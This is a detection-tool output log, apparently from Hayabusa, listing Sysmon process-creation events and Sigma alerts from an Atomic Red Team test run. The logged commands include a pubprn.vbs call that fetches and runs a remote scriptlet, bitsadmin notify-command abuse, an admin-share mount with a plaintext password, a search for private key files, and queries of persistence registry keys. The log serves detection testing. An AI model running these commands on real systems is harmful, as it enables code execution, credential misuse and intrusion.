+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" : 
Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.917 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:31.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:31.041 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /complete AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:31.134 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:31.157 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /resume AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:31.240 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:36.834 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b 
C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:37.264 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c net use \\Target\C$ P@ssw0rd1 
/u:DOMAIN\Administrator,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,medium,Mounted Windows Admin Shares with net.exe,,rules/sigma/process_creation/win_net_use_admin_share.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:46.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""echo "" ""ATOMICREDTEAM > %%windir%%\cert.key"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: 
C:\Windows\system32\cmd.exe /S /D /c"" dir c:\ /b /s .key "" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: findstr /e .key : Path: C:\Windows\System32\findstr.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:31.690 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.150 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.227 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,low,Query 
Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.304 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices : Path: C:\Windows\System32\reg.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.463 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.551 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,low,Query 
Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.728 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.789 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell : Path: 
C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.850 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.921 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" : Path: 
C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,low,Query 
Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.147 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
